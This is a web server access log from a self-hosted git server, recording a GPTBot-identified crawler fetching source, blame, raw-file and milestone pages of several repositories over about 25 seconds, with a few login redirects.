"/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/status.json?display=source" [Client 74.7.227.38] [Length 11057] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/status.json" -[17/Feb/2026:16:27:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/Dockerfile" -[17/Feb/2026:16:27:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10953] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx" -[17/Feb/2026:16:27:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10951] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:16:27:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fDebug%2fnet8.0%2fOpcConnectionTest.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 21362] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" -[17/Feb/2026:16:27:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fDebug%2fnet8.0%2fOpcConnectionTest.AssemblyInfo.cs" [Client 74.7.227.38] [Length 22167] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" -[17/Feb/2026:16:27:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/status.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/status.json" -[17/Feb/2026:16:27:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/status.json" -[17/Feb/2026:16:27:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/tsconfig.json" -[17/Feb/2026:16:27:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/tsconfig.json" -[17/Feb/2026:16:27:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/status.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/status.json" -[17/Feb/2026:16:27:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/status.json" -[17/Feb/2026:16:27:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 11205] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:27:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 15354] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:27:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13522] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:27:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 11205] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:27:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12789] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:27:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12791] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:27:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13522] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:27:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 15356] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:27:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=furthestduedate&state=closed" [Client 74.7.227.38] [Length 8510] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=furthestduedate&state=open" -[17/Feb/2026:16:27:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=leastissues&state=open" [Client 74.7.227.38] [Length 8493] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=leastissues&state=closed" -[17/Feb/2026:16:27:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=leastissues&state=all" [Client 74.7.227.38] [Length 8492] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=leastissues&state=open" -[17/Feb/2026:16:27:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 9976] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:16:27:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 16093] [Gzip 9.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13447] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:27:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 9975] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:16:27:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:27:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:27:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:27:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13449] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:27:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 16095] [Gzip 9.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:27:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:27:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:27:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:27:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 10180] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:16:27:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12298] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:27:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:16:27:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:27:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 10178] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:16:27:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:27:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12297] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:16:27:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:27:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:16:27:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=mostcomplete&state=all" [Client 74.7.227.38] [Length 8502] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=mostcomplete&state=open" -[17/Feb/2026:16:27:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=mostissues&state=open" [Client 74.7.227.38] [Length 8496] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=mostissues&state=closed" -[17/Feb/2026:16:27:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Contact.tsx" -[17/Feb/2026:16:27:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Contact.tsx" -[17/Feb/2026:16:27:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10945] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:16:27:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:16:27:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Contact.tsx" -[17/Feb/2026:16:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr 